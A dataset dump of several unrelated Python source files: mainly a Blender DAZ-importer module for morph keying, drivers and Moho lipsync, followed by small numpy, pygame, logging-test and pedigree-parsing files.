DAZ_OT_UpdateMorphs(bpy.types.Operator, KeyString, TypePrefixCat):\r\n    bl_idname = \"daz.update_morphs\"\r\n    bl_label = \"Update\"\r\n    bl_description = \"Set keys at current frame for all props of specified type with keys\"\r\n    bl_options = {'UNDO'}\r\n\r\n    @classmethod\r\n    def poll(self, context):\r\n        return (context.object and context.object.type in ['MESH', 'ARMATURE'])\r\n\r\n    def execute(self, context):\r\n        try:\r\n            rig = getRigFromObject(context.object)\r\n            if rig:\r\n                scn = context.scene\r\n                # force=False: only re-key props that already have keyframes\r\n                updateMorphs(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current, False)\r\n                updateScene(context)\r\n                updateRig(rig, context)\r\n        except DazError:\r\n            handleDazError(context)\r\n        return{'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Add morphs to keyset\r\n#------------------------------------------------------------------\r\n\r\ndef addKeySet(rig, type, prefix, catgroup, scn, frame):\r\n    if rig is None:\r\n        return\r\n    aksi = scn.keying_sets.active_index\r\n    if aksi <= -1:\r\n        aks = scn.keying_sets.new(idname = \"daz_morphs\", name = \"daz_morphs\")\r\n    aks = scn.keying_sets.active\r\n    if type == \"CUSTOM\":\r\n        for cat in getattr(rig, catgroup):\r\n            for morph in cat.morphs:\r\n                path = \"[\" + '\"' + morph.prop + '\"' + \"]\"\r\n                aks.paths.add(rig.id_data, path)\r\n    elif rig.DazNewStyleExpressions:\r\n        for key in rig.keys():\r\n            if key[0:3] == prefix:\r\n                path = \"[\" + '\"' + key + '\"' + \"]\"\r\n                aks.paths.add(rig.id_data, path)\r\n    else:\r\n        names = theMorphNames[type]\r\n        for key in rig.keys():\r\n            name = nameFromKey(key, names, rig)\r\n            if name and isinstance(rig[key], float):\r\n                path = \"[\" + '\"' + key + '\"' + \"]\"\r\n                aks.paths.add(rig.id_data, path)\r\n\r\n\r\nclass DAZ_OT_AddKeysets(bpy.types.Operator, TypePrefixCat):\r\n    bl_idname = \"daz.add_keyset\"\r\n    bl_label = \"Keyset\"\r\n    bl_description = \"Add category morphs to active custom keying set, or make new one\"\r\n    bl_options = {'UNDO'}\r\n\r\n
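    # NOTE (added comment): as with the other morph operators, poll only requires\r\n    # an active object; execute re-checks for an armature via getRigFromObject.\r\n    @classmethod\r\n    def poll(self, 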
context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n scn = context.scene\r\n keyMorphs(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Remove morph keys\r\n#------------------------------------------------------------------\r\n\r\ndef unkeyMorphs(rig, type, prefix, catgroup, scn, frame):\r\n if rig is None:\r\n return\r\n if type == \"CUSTOM\":\r\n for cat in getattr(rig, catgroup):\r\n for morph in cat.morphs:\r\n if morph.prop in rig.keys() and isActive(rig, morph.prop):\r\n unkeyProp(rig, morph.prop, frame)\r\n elif rig.DazNewStyleExpressions:\r\n for key in rig.keys():\r\n if key[0:3] == prefix and isActive(rig, key):\r\n unkeyProp(rig, key, frame)\r\n else:\r\n names = theMorphNames[type]\r\n for key in rig.keys():\r\n name = nameFromKey(key, names, rig)\r\n if name and isinstance(rig[key], float):\r\n unkeyProp(rig, key, frame)\r\n\r\n\r\nclass DAZ_OT_UnkeyMorphs(bpy.types.Operator, TypePrefixCat):\r\n bl_idname = \"daz.unkey_morphs\"\r\n bl_label = \"Remove Keys\"\r\n bl_description = \"Remove keys from all morphs of specified type at current frame\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n scn = context.scene\r\n unkeyMorphs(rig, self.type, self.prefix, self.catgroup, scn, scn.frame_current)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Update property limits\r\n#------------------------------------------------------------------\r\n\r\ndef getCustomProps(ob):\r\n props = []\r\n for catgroup in [\"DazMorphCats\", \"DazPoseCats\"]:\r\n for cat in getattr(ob, catgroup):\r\n props += [morph.prop for morph in cat.morphs]\r\n return props\r\n\r\n\r\ndef updatePropLimits(rig, context):\r\n from .driver import getShapekeyBoneDriver, setFloatProp\r\n scn = context.scene\r\n min = scn.DazPropMin\r\n max = scn.DazPropMax\r\n props = getCustomProps(rig)\r\n for ob in rig.children:\r\n if ob.type == 'MESH' and ob.data.shape_keys:\r\n for skey in ob.data.shape_keys.key_blocks:\r\n if skey.name in props or skey.name[0:2] == \"Dz\":\r\n skey.slider_min = min\r\n skey.slider_max = max\r\n\r\n for prop in rig.keys():\r\n if (prop in props or \r\n (prop[0:2] == \"Dz\" and prop[0:3] != \"DzA\")):\r\n setFloatProp(rig, prop, rig[prop], min, max)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n print(\"Property limits updated\")\r\n\r\n\r\nclass DAZ_OT_UpdatePropLimits(bpy.types.Operator):\r\n bl_idname = \"daz.update_prop_limits\"\r\n bl_label = \"Update Property Limits\"\r\n bl_description = \"Update min and max value for properties\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return context.object\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n updatePropLimits(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#------------------------------------------------------------------\r\n# Remove 
morphs\r\n#------------------------------------------------------------------\r\n\r\ndef removeAllMorphDrivers(rig, scn, prefix):\r\n from .driver import removeRigDrivers, removeTypedDrivers\r\n setupMorphPaths(scn, False)\r\n removeRigDrivers(rig)\r\n removeSelfRefs(rig)\r\n removeProps(rig, prefix)\r\n for ob in rig.children:\r\n if ob.type == 'MESH' and ob.data.shape_keys:\r\n removeTypedDrivers(ob.data.shape_keys, 'SINGLE_PROP')\r\n removeProps(ob, prefix)\r\n\r\n\r\ndef removeSelfRefs(rig):\r\n for pb in rig.pose.bones:\r\n if len(pb.constraints) > 0:\r\n cns = pb.constraints[0]\r\n if (cns.mute and\r\n cns.name == \"Do Not Touch\"):\r\n pb.constraints.remove(cns)\r\n\r\n\r\ndef removeProps(ob, prefix):\r\n ob.DazCustomMorphs = ob.DazCustomPoses = False\r\n for catgroup in [\"DazMorphCats\", \"DazPoseCats\"]:\r\n for cat in getattr(ob, catgroup):\r\n key = \"DazShow\"+cat.name\r\n if hasattr(ob, key):\r\n setattr(ob, key, False)\r\n for morph in cat.morphs:\r\n key = morph.prop\r\n if key in ob.keys():\r\n ob[key] = 0.0\r\n del ob[key]\r\n\r\n n = len(prefix)\r\n for key in ob.keys():\r\n if key[0:n] == prefix:\r\n ob[key] = 0.0\r\n del ob[key]\r\n for type in theMorphNames.keys():\r\n key = \"Daz\"+type\r\n if key in ob.keys():\r\n ob[key] = False\r\n del ob[key]\r\n\r\n\r\nclass DAZ_OT_RemoveMorphDrivers(bpy.types.Operator):\r\n bl_idname = \"daz.remove_morph_drivers\"\r\n bl_label = \"Remove Morph Drivers\"\r\n bl_description = \"Remove drivers associated with morphs (not corrective shapekeys)\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return context.object\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n if rig:\r\n removeAllMorphDrivers(rig, context.scene, \"Dz\")\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#-------------------------------------------------------------\r\n# Add and remove driver\r\n#-------------------------------------------------------------\r\n\r\ndef getActiveShapeKey(ob):\r\n if ob.active_shape_key_index == 0:\r\n raise DazError(\"Cannot add/remove driver to first shapekey\")\r\n skey = ob.active_shape_key\r\n if skey is None:\r\n raise DazError(\"Object %s has no active shapekey\" % ob.name)\r\n return skey\r\n\r\n\r\nclass DAZ_OT_AddDriver(bpy.types.Operator):\r\n bl_idname = \"daz.add_shapekey_driver\"\r\n bl_label = \"Add Driver\"\r\n bl_description = \"Add rig driver to active shapekey\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def execute(self, context):\r\n try:\r\n self.addDriver(context)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n def addDriver(self, context):\r\n from .driver import makeShapekeyDriver\r\n ob = context.object\r\n skey = getActiveShapeKey(ob)\r\n rig = ob.parent\r\n if (rig and rig.type == 'ARMATURE'):\r\n sname = skey.name\r\n makeShapekeyDriver(ob, sname, skey.value, rig, sname)\r\n addToCategories(rig, [sname], \"Shapekeys\")\r\n ob.DazCustomMorphs = True\r\n rig.DazCustomMorphs = True\r\n\r\n\r\nclass DAZ_OT_RemoveDriver(bpy.types.Operator):\r\n bl_idname = \"daz.remove_shapekey_driver\"\r\n bl_label = \"Remove Driver\"\r\n bl_description = \"Remove rig driver from active shapekey\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 
'MESH')\r\n\r\n def execute(self, context):\r\n try:\r\n self.removeDriver(context.object)\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n def removeDriver(self, ob):\r\n skey = getActiveShapeKey(ob)\r\n removeShapekeyDriver(ob, skey)\r\n rig = ob.parent\r\n if (rig and rig.type == 'ARMATURE' and\r\n skey.name in rig.keys()):\r\n del rig[skey.name]\r\n\r\n\r\ndef removeShapekeyDriver(ob, skey):\r\n adata = ob.data.shape_keys.animation_data\r\n if (adata and adata.drivers):\r\n for fcu in adata.drivers:\r\n words = fcu.data_path.split('\"')\r\n if (words[0] == \"key_blocks[\" and\r\n words[1] == skey.name):\r\n ob.data.shape_keys.driver_remove(fcu.data_path)\r\n return\r\n raise DazError(\"Did not find driver for shapekey %s\" % skey.name)\r\n\r\n#-------------------------------------------------------------\r\n#\r\n#-------------------------------------------------------------\r\n\r\ndef getRigFromObject(ob):\r\n if ob.type == 'ARMATURE':\r\n return ob\r\n else:\r\n ob = ob.parent\r\n if ob is None or ob.type != 'ARMATURE':\r\n return None\r\n return ob\r\n\r\n\r\nclass DAZ_OT_ToggleAllCats(bpy.types.Operator, UseOpenBool):\r\n bl_idname = \"daz.toggle_all_cats\"\r\n bl_label = \"Toggle All Categories\"\r\n bl_description = \"Toggle all morph categories on and off\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object)\r\n\r\n def execute(self, context):\r\n try:\r\n ob = getRigFromObject(context.object)\r\n if ob:\r\n for key in ob.keys():\r\n if key[0:7] == \"DazShow\":\r\n ob[key] = self.useOpen\r\n except DazError:\r\n handleDazError(context)\r\n return {'FINISHED'}\r\n\r\n#-------------------------------------------------------------\r\n#\r\n#-------------------------------------------------------------\r\n\r\ndef isActive(rig, key, force=False):\r\n if force:\r\n return True\r\n elif \"DzA\"+key in rig.keys():\r\n return rig[\"DzA\"+key]\r\n else:\r\n return True\r\n\r\n\r\ndef keyProp(rig, key, frame):\r\n rig.keyframe_insert('[\"%s\"]' % key, frame=frame)\r\n\r\n\r\ndef unkeyProp(rig, key, frame):\r\n rig.keyframe_delete('[\"%s\"]' % key, frame=frame)\r\n\r\n\r\ndef getPropFCurves(rig, key):\r\n if rig.animation_data and rig.animation_data.action:\r\n path = '[\"%s\"]' % key\r\n return [fcu for fcu in rig.animation_data.action.fcurves if path == fcu.data_path]\r\n return []\r\n\r\n\r\ndef autoKeyProp(rig, key, scn, frame, force):\r\n if scn.tool_settings.use_keyframe_insert_auto:\r\n if force or getPropFCurves(rig, key):\r\n keyProp(rig, key, frame)\r\n\r\n\r\ndef pinProp(rig, scn, key, type, prefix, catgroup, frame):\r\n if rig:\r\n clearMorphs(rig, type, prefix, catgroup, scn, frame, True)\r\n rig[key] = 1.0\r\n autoKeyProp(rig, key, scn, frame, True)\r\n\r\n\r\nclass DAZ_OT_PinProp(bpy.types.Operator, KeyString, TypePrefixCat):\r\n bl_idname = \"daz.pin_prop\"\r\n bl_label = \"\"\r\n bl_description = \"Pin property\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type in ['MESH', 'ARMATURE'])\r\n\r\n def execute(self, context):\r\n try:\r\n rig = getRigFromObject(context.object)\r\n scn = context.scene\r\n setupMorphPaths(scn, False)\r\n pinProp(rig, scn, self.key, self.type, self.prefix, self.catgroup, scn.frame_current)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n# 
---------------------------------------------------------------------\r\n# Load Moho\r\n# ---------------------------------------------------------------------\r\n\r\nMoho = {\r\n \"rest\" : \"Rest\",\r\n \"etc\" : \"K\",\r\n \"AI\" : \"AA\",\r\n \"O\" : \"OU\",\r\n \"U\" : \"OW\",\r\n \"WQ\" : \"AH\",\r\n \"L\" : \"L\",\r\n \"E\" : \"EH\",\r\n \"MBP\" : \"M\",\r\n \"FV\" : \"F\"\r\n}\r\n\r\ndef getVisemesPrefix(rig):\r\n return Visemes[rig.DazVisemes][2]\r\n\r\n\r\ndef loadMoho(context, filepath, offs):\r\n from .fileutils import safeOpen\r\n scn = context.scene\r\n ob = context.object\r\n if ob.type == 'ARMATURE':\r\n rig = ob\r\n elif ob.type == 'MESH':\r\n rig = ob.parent\r\n else:\r\n rig = None\r\n if rig is None:\r\n return\r\n setActiveObject(context, rig)\r\n bpy.ops.object.mode_set(mode='POSE')\r\n if rig.DazNewStyleExpressions:\r\n vprefix = \"DzV\"\r\n prefix = \"DzV\"\r\n else:\r\n vprefix = getVisemesPrefix(rig)\r\n prefix = \"\"\r\n auto = scn.tool_settings.use_keyframe_insert_auto\r\n scn.tool_settings.use_keyframe_insert_auto = True\r\n fp = safeOpen(filepath, \"rU\")\r\n for line in fp:\r\n words= line.split()\r\n if len(words) < 2:\r\n pass\r\n else:\r\n frame = int(words[0]) + offs\r\n if words[1] == \"rest\":\r\n clearMorphs(rig, \"Visemes\", prefix, None, scn, frame, True)\r\n else:\r\n key = vprefix + Moho[words[1]]\r\n print(\"MOI\", frame, words[1], key)\r\n pinProp(rig, scn, key, \"Visemes\", prefix, None, frame)\r\n fp.close()\r\n #setInterpolation(rig)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n scn.tool_settings.use_keyframe_insert_auto = auto\r\n print(\"Moho file %s loaded\" % filepath)\r\n\r\n\r\nclass DAZ_OT_LoadMoho(bpy.types.Operator, DatFile, SingleFile):\r\n bl_idname = \"daz.load_moho\"\r\n bl_label = \"Load Moho\"\r\n bl_description = \"Load Moho (.dat) file\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n loadMoho(context, self.filepath, 1.0)\r\n return{'FINISHED'}\r\n\r\n def invoke(self, context, event):\r\n context.window_manager.fileselect_add(self)\r\n return {'RUNNING_MODAL'}\r\n\r\n# ---------------------------------------------------------------------\r\n# Delete lipsync\r\n# ---------------------------------------------------------------------\r\n\r\ndef getArmature(ob):\r\n if ob.type == 'MESH':\r\n ob = ob.parent\r\n if ob and ob.type == 'ARMATURE':\r\n return ob\r\n return None\r\n\r\n\r\ndef deleteLipsync(rig):\r\n if rig.animation_data is None:\r\n return\r\n act = rig.animation_data.action\r\n if act is None:\r\n return\r\n if rig.MhxFaceShapeDrivers:\r\n for fcu in act.fcurves:\r\n if (fcu.data_path[0:5] == '[\"Mhf' and\r\n fcu.data_path[5:9] in [\"mout\", \"lips\", \"tong\"]):\r\n act.fcurves.remove(fcu)\r\n for key in getMouthShapes():\r\n rig[\"Mhf\"+key] = 0.0\r\n elif rig.MhxFacePanel:\r\n for key in getMouthShapes():\r\n pb,_fac,idx = getBoneFactor(rig, key)\r\n path = 'pose.bones[\"%s\"].location' % pb.name\r\n for fcu in act.fcurves:\r\n if fcu.data_path == path:\r\n act.fcurves.remove(fcu)\r\n pb.location[idx] = 0.0\r\n\r\n\r\nclass DAZ_OT_DeleteLipsync(bpy.types.Operator):\r\n bl_idname = \"daz.delete_lipsync\"\r\n bl_label = \"Delete Lipsync\"\r\n bl_description = \"Delete F-curves associated with lipsync\"\r\n bl_options = {'UNDO'}\r\n\r\n def execute(self, context):\r\n rig = getArmature(context.object)\r\n if rig:\r\n deleteLipsync(rig)\r\n updateScene(context)\r\n updateRig(rig, context)\r\n return{'FINISHED'}\r\n\r\n#-------------------------------------------------------------\r\n# 
Convert pose to shapekey\r\n#-------------------------------------------------------------\r\n\r\nclass DAZ_OT_ConvertMorphsToShapes(bpy.types.Operator, MorphTypes):\r\n bl_idname = \"daz.convert_morphs_to_shapes\"\r\n bl_label = \"Convert Morphs To Shapes\"\r\n bl_description = \"Convert face rig poses to shapekeys\"\r\n bl_options = {'UNDO'}\r\n\r\n @classmethod\r\n def poll(self, context):\r\n return (context.object and context.object.type == 'MESH')\r\n\r\n def draw(self, context):\r\n self.layout.prop(self, \"units\")\r\n self.layout.prop(self, \"expressions\")\r\n self.layout.prop(self, \"visemes\")\r\n self.layout.prop(self, \"other\")\r\n\r\n def execute(self, context):\r\n try:\r\n ob = context.object\r\n rig = ob.parent\r\n if rig and rig.type == 'ARMATURE':\r\n self.convertToShapes(context, rig, ob)\r\n except DazError:\r\n handleDazError(context)\r\n return{'FINISHED'}\r\n\r\n def invoke(self, context, event):\r\n context.window_manager.invoke_props_dialog(self)\r\n return {'RUNNING_MODAL'}\r\n \r\n \r\n def convertToShapes(self, context, rig, ob): \r\n from .daz import getPropGroupProps\r\n keys = getPropGroupProps(rig)\r\n keys.sort()\r\n for key in keys:\r\n rig[key] = 0.0\r\n for key in keys:\r\n mname = self.getMorphName(key, ob)\r\n if (ob.data.shape_keys and \r\n mname in ob.data.shape_keys.key_blocks.keys()):\r\n continue\r\n if mname:\r\n for mod in ob.modifiers:\r\n if mod.type == 'ARMATURE':\r\n rig[key] = 1.0\r\n updateScene(context)\r\n updateRig(rig, context)\r\n self.applyArmature(ob, rig, mod, mname)\r\n rig[key] = 0.0\r\n break\r\n updateScene(context)\r\n updateRig(rig, context)\r\n updateDrivers(rig)\r\n\r\n\r\n def getMorphName(self, key, ob):\r\n if key[0:3] == \"DzU\" and self.units:\r\n return key[3:]\r\n if key[0:3] == \"DzE\" and self.expressions:\r\n return key[3:]\r\n if key[0:3] == \"DzV\" and self.visemes:\r\n return key[3:]\r\n if self.other and key[0:2] != \"Dz\" and key[0:3] != \"Daz\":\r\n return key\r\n return None \r\n \r\n\r\n def applyArmature(self, ob, rig, mod, mname):\r\n mod.name = mname\r\n bpy.ops.object.modifier_apply(apply_as='SHAPE', modifier=mname)\r\n skey = ob.data.shape_keys.key_blocks[mname]\r\n skey.value = 0.0\r\n offsets = [(skey.data[vn].co - v.co).length for vn,v in enumerate(ob.data.vertices)]\r\n omax = max(offsets)\r\n omin = min(offsets)\r\n eps = 1e-2 * ob.DazScale # eps = 0.1 mm\r\n if abs(omax) < eps and abs(omin) < eps:\r\n idx = ob.data.shape_keys.key_blocks.keys().index(skey.name)\r\n ob.active_shape_key_index = idx\r\n bpy.ops.object.shape_key_remove()\r\n ob.active_shape_key_index = 0\r\n nmod = ob.modifiers.new(rig.name, \"ARMATURE\")\r\n nmod.object = rig\r\n nmod.use_deform_preserve_volume = True \r\n for i in range(len(ob.modifiers)-1):\r\n bpy.ops.object.modifier_move_up(modifier=nmod.name)\r\n\r\n#-------------------------------------------------------------\r\n# Property groups, for drivers\r\n#-------------------------------------------------------------\r\n\r\nclasses = [\r\n DAZ_OT_Update,\r\n DAZ_OT_SelectAll,\r\n DAZ_OT_SaveFavorites,\r\n DAZ_OT_LoadFavorites,\r\n DAZ_OT_LoadAllUnits,\r\n DAZ_OT_LoadAllExpressions,\r\n DAZ_OT_LoadAllVisemes,\r\n DAZ_OT_LoadAllCorrectives,\r\n DAZ_OT_ImportMorph,\r\n DAZ_OT_RenameCategoryOK,\r\n DAZ_OT_RemoveCategoryOK,\r\n DAZ_OT_ChangeCategoryCancel,\r\n DAZ_OT_ChangeCategory,\r\n DAZ_OT_Prettify,\r\n DAZ_OT_ForceUpdate,\r\n DAZ_OT_ActivateAll,\r\n DAZ_OT_DeactivateAll,\r\n DAZ_OT_ClearMorphs,\r\n DAZ_OT_UpdateMorphs,\r\n DAZ_OT_AddKeysets,\r\n 
DAZ_OT_KeyMorphs,\r\n DAZ_OT_UnkeyMorphs,\r\n DAZ_OT_UpdatePropLimits,\r\n DAZ_OT_RemoveMorphDrivers,\r\n DAZ_OT_AddDriver,\r\n DAZ_OT_RemoveDriver,\r\n DAZ_OT_ToggleAllCats,\r\n DAZ_OT_PinProp,\r\n DAZ_OT_LoadMoho,\r\n DAZ_OT_DeleteLipsync,\r\n DAZ_OT_ConvertMorphsToShapes,\r\n\r\n #DazCategory,\r\n #DazCustomGroup,\r\n]\r\n\r\ndef initialize():\r\n for cls in classes:\r\n bpy.utils.register_class(cls)\r\n\r\n bpy.types.Object.DazCustomMorphs = BoolProperty(default = False)\r\n bpy.types.Object.DazCustomPoses = BoolProperty(default = False)\r\n\r\n bpy.utils.register_class(DazCustomGroup)\r\n bpy.utils.register_class(DazCategory)\r\n\r\n bpy.types.Object.DazMorphCats = CollectionProperty(type = DazCategory)\r\n bpy.types.Object.DazPoseCats = CollectionProperty(type = DazCategory)\r\n\r\n bpy.types.Scene.DazMorphCatsOpen = BoolProperty(default = False)\r\n bpy.types.Scene.DazPoseCatsOpen = BoolProperty(default = False)\r\n\r\n bpy.types.Scene.DazMorphCatsContent = EnumProperty(\r\n items = [],\r\n name = \"Morph\")\r\n bpy.types.Scene.DazPoseCatsContent = EnumProperty(\r\n items = [],\r\n name = \"Pose\")\r\n\r\n bpy.types.Scene.DazNewCatName = StringProperty(\r\n name = \"New Name\",\r\n default = \"Name\")\r\n\r\n\r\n\r\ndef uninitialize():\r\n for cls in classes:\r\n bpy.utils.unregister_class(cls)\r\n\r\n bpy.utils.unregister_class(DazCustomGroup)\r\n bpy.utils.unregister_class(DazCategory)\r\n","repo_name":"Diffeomorphic/import-daz","sub_path":"morphing.py","file_name":"morphing.py","file_ext":"py","file_size_in_byte":59328,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"} +{"seq_id":"10593127011","text":"import numpy as np\ndef smart_eigenvalue_decomposition_covariance(features: np.ndarray):\n \"\"\"\n Lemma 28: Efficient Eigen value decomposition\n :param n: normalization\n :param features: features used to create covariance matrix times x P\n :param T: Weight used to normalize matrix\n :return: Left eigenvectors PxT and eigenvalues without zeros\n \"\"\"\n [T, P] = features.shape\n\n if P > T:\n covariance = features @ features.T /T\n\n else:\n covariance = features.T @ features / T\n\n eigval, eigvec = np.linalg.eigh(covariance)\n # eigvec = eigvec[:, eigval > 10 ** (-10)]\n # eigval = eigval[eigval > 10 ** (-10)]\n\n if P > T:\n # project features on normalized eigenvectors\n eigvec = features.T @ eigvec * (eigval ** (-1 / 2)).reshape(1, -1) / np.sqrt(T)\n\n return eigval, eigvec\n","repo_name":"AntoineDidisheim/didipack","sub_path":"didipack/utils_didi/smart_algebra.py","file_name":"smart_algebra.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42591540581","text":"import pygame\nimport eventer\nimport settings as st\nimport engineUI as eui\nimport UniPy as pe\n\ndraws = {\n -1: eui.drawProjects,\n 0: eui.drawUI,\n 1: eui.drawApp,\n 2: eui.drawCR,\n 3: eui.drawPAC,\n 4: eui.drawExportProject\n}\n\nwhile 1:\n pe.deltaTime = st.clock.tick(st.fps) / 1000.0\n st.win.fill(st.uiBgColor)\n st.MP = pygame.mouse.get_pos()\n \n for event in pygame.event.get():\n eventer.check_event(event)\n \n eui.srollObjectComponents()\n draws[st.drawingLayer]()\n \n messages_to_remove = []\n for msg in eui.message.messages:\n if msg.ifDel:\n messages_to_remove.append(msg)\n else:\n msg.update()\n for msg in messages_to_remove:\n eui.message.messages.remove(msg)\n \n try: pygame.display.flip()\n except: 
pass","repo_name":"AlmazCode/UniPy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36959350313","text":"import unittest\n\nimport clevokeyboardcontrol.logger as logger\n\nimport logging\nimport io\n\n\nclass LoggerTest(unittest.TestCase):\n def setUp(self):\n ## Called before testfunction is executed\n self.logger = logging.Logger(__name__)\n self.logger.propagate = False\n self.logger.setLevel( logging.DEBUG )\n self.buffer = io.StringIO()\n handler = logging.StreamHandler( self.buffer )\n formatter = logger.createFormatter()\n handler.setFormatter( formatter )\n self.logger.addHandler( handler )\n\n def tearDown(self):\n ## Called after testfunction was executed\n self.logger = None\n self.buffer.close()\n self.buffer = None\n\n def test_emptyMessage(self):\n self.logger.info(\"\")\n msg = self.buffer.getvalue()\n self.assertEqual(msg, \"\\n\")\n\n def test_newLines_Linux(self):\n self.logger.info(\"\\n\\n\\n\")\n msg = self.buffer.getvalue()\n self.assertEqual(msg, \"\\n\\n\\n\\n\")\n\n def test_newLines_Windows(self):\n self.logger.info(\"\\r\\n\\r\\n\\r\\n\")\n msg = self.buffer.getvalue()\n self.assertEqual(msg, \"\\r\\n\\r\\n\\r\\n\\n\")\n","repo_name":"anetczuk/ClevoKeyboardControl","sub_path":"src/testclevokeyboardcontrol/test_logger.py","file_name":"test_logger.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"22115465024","text":"from .. import utils\n\nimport errno\nimport re\nimport os\nimport csv\n\n###############################################################################\n# TO MATCH THE MERLIN documentation\n\nclass Individual(object):\n __slots__ = [ '__famID', '__indivID', '__fatherID', '__motherID', '__gender', '__features' ]\n def __init__(self, famID, indivID, fatherID, motherID, gender, features):\n self.__famID = str(famID)\n self.__indivID = str(indivID)\n self.__fatherID = fatherID\n self.__motherID = motherID\n self.__gender = gender\n self.__features = features\n #edef\n\n def __str__(self):\n dstr = \"Pedigree Individual\\n\"\n dstr += \" Family ID: %s\\n\" % self.__famID\n dstr += \" Individual ID: %s\\n\" % self.__indivID\n dstr += \" Mother/Father ID: %s/%s\\n\" % (self.__motherID, self.__fatherID)\n dstr += \" Gender: %s\\n\" % self.__gender\n dstr += \" Affection status:\\n\"\n for affection in self.__features.affections:\n dstr += \" %s : %s\" % (self.__features.getFeatureName(affection), self.__features[affection])\n #efor\n\n return dstr\n #edef\n\n def toRow(self):\n row = [self.__famID, self.__indivID, \n self.__fatherID if self.__fatherID is not None else '0',\n self.__motherID if self.__motherID is not None else '0',\n self.__gender] + self.__features.raw\n return row\n #edef\n\n @staticmethod\n def fromRow(row, datFormat):\n row = [ e.strip() for e in row ]\n famID = str(row[0])\n indivID = str(row[1])\n father = None if row[2] == '0' else row[2]\n mother = None if row[3] == '0' else row[3]\n gender = 'm' if (row[4] in [ '1', 'm' ]) else 'f'\n\n features = PhenoGenotype(row[5:], datFormat)\n return Individual(famID, indivID, father, mother, gender, features)\n #edef\n\n @property\n def famID(self):\n return self.__famID\n #edef\n\n @property\n def ID(self):\n return self.__indivID\n #edef\n\n def setID(self, newID):\n self.__indivID = newID\n #edef\n\n @property\n def fatherID(self):\n return 
self.__fatherID\n #edef\n\n def setFather(self, newID):\n self.__fatherID = newID\n #edef\n\n @property\n def motherID(self):\n return self.__motherID\n #edef\n\n def setMother(self, newID):\n self.__motherID = newID\n #edef\n\n @property\n def gender(self):\n return self.__gender\n #edef\n\n @property\n def features(self):\n return self.__features\n #edef\n\n @property\n def isFounder(self):\n return (self.fatherID is None) and (self.motherID is None)\n #edef\n\n def getFeature(self, feature):\n return self.__features[feature]\n #edef\n\n def setFeature(self, feature, value):\n self.__features[feature] = value\n #edef\n\n def copy(self, datFormat):\n features = self.__features.copy(datFormat)\n return Individual(self.famID, self.__indivID, self.__fatherID, self.motherID, self.gender, features)\n #edef\n\n#eclass\n\n###############################################################################\n\nclass PhenoGenotype(object):\n __slots__ = [ '__row', '__datFormat' ]\n def __init__(self, row, datFormat):\n\n self.__row = row\n self.__datFormat = datFormat\n\n nFeaturesRow = len(row)\n nFeaturesDat = len(datFormat)\n\n fixedRow = { datFormat.getFeatureName(i) : datFormat.emptyValueOfField(i) for i in range(nFeaturesDat) }\n rowIndex = 0\n datIndex = 0\n while datIndex < nFeaturesDat:\n if rowIndex >= nFeaturesRow:\n break\n #fi\n featureName = datFormat.getFeatureName(datIndex)\n featureType = self.__datFormat.getFeatureType(datIndex)\n if (featureType == 'm') and ('/' not in row[rowIndex]):\n fixedRow[featureName] = '%s/%s' % (row[rowIndex], row[rowIndex+1])\n rowIndex += 2\n datIndex += 1\n else:\n fixedRow[featureName] = row[rowIndex]\n rowIndex += 1\n datIndex += 1\n #fi\n #ewhile\n\n self.__row = fixedRow\n\n if rowIndex < nFeaturesRow:\n utils.error(\"More provided features than in DAT file. IGNORED!\")\n elif datIndex < nFeaturesDat:\n utils.error(\"More DAT features than provided. Filling with unknown values. 
